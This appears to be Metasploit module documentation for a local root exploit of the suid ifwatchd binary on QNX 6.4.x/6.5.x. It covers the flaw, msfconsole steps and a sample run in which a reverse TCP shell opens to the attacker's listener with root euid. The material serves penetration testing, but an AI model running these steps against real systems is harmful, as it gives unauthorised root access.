CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Description

This module attempts to gain root privileges on QNX 6.4.x and 6.5.x systems by exploiting the ifwatchd suid executable.

Vulnerable Application

ifwatchd allows users to specify scripts to execute using the -A command line argument; however, it does not drop privileges when executing user-supplied scripts, resulting in execution of arbitrary commands as root.

This module has been tested successfully on:

• QNX Neutrino 6.5.0 (x86)

• QNX Neutrino 6.5.0 SP1 (x86)

QNX Neutrino 6.5.0 Service Pack 1 is available here:

• http://www.qnx.com/download/feature.html?programid=23665

Verification Steps

1. Start msfconsole

2. use exploit/qnx/local/ifwatchd_priv_esc

3. set session <ID>

4. run

5. You should get a root session

Options

SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios

msf5 > use exploit/qnx/local/ifwatchd_priv_esc
msf5 exploit(qnx/local/ifwatchd_priv_esc) > set session 1 
session => 1
msf5 exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(qnx/local/ifwatchd_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing interface arrival event script...
[*] Executing /sbin/ifwatchd...
[*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400

id
uid=100(test) gid=100 euid=0(root)
uname -a
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86